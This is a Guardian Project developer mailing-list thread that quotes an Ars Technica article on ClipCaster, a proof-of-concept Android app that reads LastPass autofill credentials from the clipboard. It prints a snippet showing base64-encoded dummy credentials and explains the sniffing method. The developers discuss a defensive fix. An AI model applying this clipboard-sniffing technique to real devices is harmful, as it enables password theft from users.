[guardian-dev] Proof-of-concept exploit against LastPass could easily be extended to other apps.

[Josh Steiner]

Agreed, that would be a great proof of concept.  I'll add support to
the StoryMaker's SecureShare library as well.  Once we have this in
production use we should approach LastPass and the others to see get
them to leverage it too.

-Josh

On Mon, Nov 24, 2014 at 3:24 AM, Hans-Christoph Steiner
<hans at guardianproject.info> wrote:
>
> (moving this to guardian-dev)
>
> This would be a very nice application of our TrustedIntents library.  We could
> define an Intent method for handing a password, then add TrustedIntents to
> KeePassDroid and then our apps, especially Orweb and Orfox.  I think that
> would serve as a good example as a way to fix this issue without having to
> change Android itself at all.
>
> .hc
>
> noel hidalgo | gProject:
>> http://arstechnica.com/security/2014/11/using-a-password-manager-on-android-it-may-be-wide-open-to-sniffing-attacks/
>>
>>
>> page1image776
>> RISK ASSESSMENT / SECURITY & HACKTIVISM
>> Using a password manager on Android? It may be wide open
>>
>> page1image2328
>> to sniffing attacks
>>
>> Proof-of-concept exploit against LastPass could easily be extended to other apps.
>>
>> by Dan Goodin - Nov 21, 2014 6:55 pm UTC
>>
>> ANDROID HACKING
>>
>> page1image4680 page1image4840 page1image5000 page1image5160 page1image5320
>> Aurich Lawson
>>
>> page1image5976
>> In early 2013, researchers exposed some unsettling risks stemming from
>> Android-based password managers. In a paper titled "Hey, You, Get Off of My
>> Clipboard," they documented how passwords managed by 21 of the most popular such
>> apps could be accessed by any other app on an Android device, even those with
>> extremely low- level privileges. They suggested several measures to help fix the
>> problem.
>>
>> Almost two years later, the threat remains viable in at least some, if not all,
>> of the apps originally analyzed. An app recently made available on Google Play,
>> for instance, has no trouble divining the passwords managed by LastPass, one of
>> the leading managers on the market, as well as the lesser-known KeePassDroid.
>> With additional work, it's likely that the proof-of-concept ClipCaster app would
>> work seamlessly against many other managers, too, said Xiao Bao Clark, the
>> Australia-based programmer who developed it. While ClipCaster does nothing
>> more than display the plaintext of passwords that LastPass and KeePassDroid
>> funnel through Android handsets, a malicious app with only network privileges
>> could send the credentials to an attacker without the user having any idea what
>> was happening.
>>
>> "Besides the insecurity of it, what annoyed me was that I was never told any of
>> this while I was signing up or setting up the LastPass app," Clark wrote in an
>> e-mail. "Instead, I got the strong impression from LastPass that everything was
>> very secure, and I needn't worry about any of it. If they at least told users
>> the security issues using these features brings, then the users themselves could
>> decide on their own trade-off between usability and security. Not mentioning it
>> at all strikes me as disingenuous."
>>
>> Asked if LastPass has ever notified users of the risk, company CEO Joe Siegrist
>> didn't give a yes or no answer. Instead, he responded, "This is an any clipboard
>> activity problem [his emphasis] and impacts any password manager involving the
>> clipboard (100% of them)—the way all password managers have consistently allowed
>> you to enter your password into other apps since Android has existed. This
>> demonstration is aimed at LastPass, but it's the whole of Android that must be
>> addressed."
>>
>> Clark agreed that any Android-based password manager that uses the OS clipboard
>> is susceptible. He strongly recommends that people stop using any app setup that
>> works this way. Many apps use standalone browsers, browser extensions, or
>> software keyboards to enter credentials into login fields. There is no evidence
>> they are susceptible to sniffing. The reason ClipCaster takes special aim at
>> LastPass, Clark said, is simple. It just happened to be the manager he installed
>> on his phone. There are no reports that password managers running
>>
>> on iOS or Windows Phone are vulnerable. But there can be way to know for sure,
>> since Ars is unaware of the any comprehensive study testing the security of
>> managers on those platforms.
>>
>> As already alluded, the threat stems from the use of the Android clipboard,
>> which acts as a temporary cache for text that is being copied and pasted, either
>> within the same app or from one app to another. Android has no official
>> programming interface that secures the clipboard. By design, its contents are
>> available to any app installed on the phone, from the highest privileged banking
>> app to one with no privileges at all. (ClipCaster, for instance, requires no
>> permissions.) Siegrist rightly noted that any password manager that makes use of
>> the Android clipboard—and there are plenty, including LastPass—is vulnerable.
>>
>> LastPass has several different methods for plucking passwords out of their
>> highly fortified vault and plugging them into the password field of a browser or
>> app. Not all of the options are susceptible to sniffing, but notably, the one
>> LastPass recommends that Android users choose leaves them wide open. The option
>> is known as autofill, a feature that seamlessly plugs passwords into apps and
>> the Chrome browser.
>>
>> Shortly after installing LastPass, Clark came across the 2013 paper that
>> discussed the clipboard vulnerability. It got him wondering about the
>> security of his decision, so he began analyzing the JavaScript autofill uses
>> to populate username and password fields in Chrome. In about an hour, he had
>> a crude but working exploit that monitored the Android clipboard and captured
>> login credentials transported by autofill. His proof-of-concept app works by
>> listening to the notices the clipboard broadcasts to installed apps and looking
>> for a familiar patterns in the code.
>>
>> Clark concocted a dummy account containing the username "j.doe at actisec.com" and
>> the password "s4f3p4assw0rd," and observed the way the credentials were funneled
>> through the clipboard. Autofill wrote a blob of code to the clipboard and then
>> pasted it into the address bar of Chrome. The code contained the following
>> telltale lines:
>>
>> if (l_bte) { ;
>>
>> l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))))
>>
>> }
>> l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));
>>
>> An image of ClipCaster sniffing the password "s4f3p4assw0rd" as a user logs in
>> to Facebook.
>> Xiao Bao Clark
>> "atob" is a JavaScript function for decoding strings that have been
>> converted into base64-encoded representations. Presumably, LastPass
>> developers chose the encoding to make it less obvious to other apps what the
>> clipboard contents are. But to anyone with a modest amount of training,
>> the measure is little more than an exercise in the largely discredited
>> protection known as "security through obscurity." ClipCaster monitors the
>> clipboard for the patterns, decodes the base64 strings and, as illustrated in
>> the image to the right, displays them.
>>
>> In e-mails sent to Ars, Siegrist, the LastPass CEO, rightly noted that
>> the vulnerability isn't unique to his company's product, or even to Android devices.
>>
>> "This is an OS-level issue that impacts everything running on Android," he said.
>> "If you use the clipboard to copy any data, a malicious app could obtain it—like
>> installing a clipboard monitoring software on Windows or a keylogger on Windows.
>> You can compromise your security by installing bad software."
>>
>> Siegrist also noted that attacks like the one carried out by ClipCaster work
>> only when LastPass or another password manager runs on an Android device
>> that has a malicious app installed, and then only when the manager uses the
>> device's clipboard. The CEO said that LastPass users should run only "trusted"
>> apps, meaning those distributed over Google Play by a trusted company and widely
>> used and reviewed.
>>
>> Still, his statements omit some important distinctions. First, LastPass on
>> Windows doesn't use the clipboard to pass login credentials to Chrome,
>> and presumably other browsers, Clark's research found. And second, most Windows
>> users—and a growing number of Mac users as well—use antivirus protection to
>> detect such threats. Android antivirus apps exist, but there's little evidence
>> that most users install one. Third, his advice about installing only trusted
>> apps is sound, but given the regular occurrence of malicious apps that slip
>> through Google defenses and are hosted in the company's official Play Store,
>> it's unrealistic to expect end users to always spot rogue titles.
>>
>> page2image36576 page2image36744
>> rogue titles.
>>
>> One of the key defenses of Android is its application sandbox, which prevents
>> one app from accessing sensitive data belonging to another app, presumably under
>> the premise that not all apps will be trustworthy. When an app as sensitive as a
>> password manager doesn't enjoy a protection as crucial as this, the companies
>> should make this limitation explicit. LastPass and the developers of other
>> vulnerable managers should be
>>
>> forthright about the risks and tell users what they can do to protect
>> themselves. In the case of LastPass, the threat can be eliminated simply by
>> opting out of the recommended autofill option and instead using the LastPass
>> browser or LastPass keyboard. Many users may decide the convenience of autofill
>> is worth the added risk, but at least they will be making an informed choice.
>>
>> Dan Goodin / Dan is the Security Editor at Ars Technica, which he joined in 2012
>> after working for The Register, the Associated Press, Bloomberg News, and other
>> publications.
>> @dangoodin001
>>
>> page3image9728
>> © 2014 Condé Nast. All rights reserved
>> Use of this Site constitutes acceptance of our User Agreement (effective
>> 3/21/12) and Privacy Policy (effective 3/21/12)
>> Your California Privacy Rights
>> The material on this site may not be reproduced, distributed, transmitted,
>> cached or otherwise used, except with the prior written permission of Condé Nast.
>>
>>
>>
>> _______________________________________________
>> Guardian-internal mailing list
>>
>> Post: Guardian-internal at lists.mayfirst.org
>> List info: https://lists.mayfirst.org/mailman/listinfo/guardian-internal
>>
>> To Unsubscribe
>>         Send email to:  Guardian-internal-unsubscribe at lists.mayfirst.org
>>         Or visit: %(user_optionsurl)s
>>
>> You are subscribed as: %(user_address)s
>>
>
> --
> PGP fingerprint: 5E61 C878 0F86 295C E17D  8677 9F0F E587 374B BE81
> _______________________________________________
> Guardian-dev mailing list
>
> Post: Guardian-dev at lists.mayfirst.org
> List info: https://lists.mayfirst.org/mailman/listinfo/guardian-dev
>
> To Unsubscribe
>         Send email to:  Guardian-dev-unsubscribe at lists.mayfirst.org
>         Or visit: https://lists.mayfirst.org/mailman/options/guardian-dev/josh%40vitriolix.com
>
> You are subscribed as: josh at vitriolix.com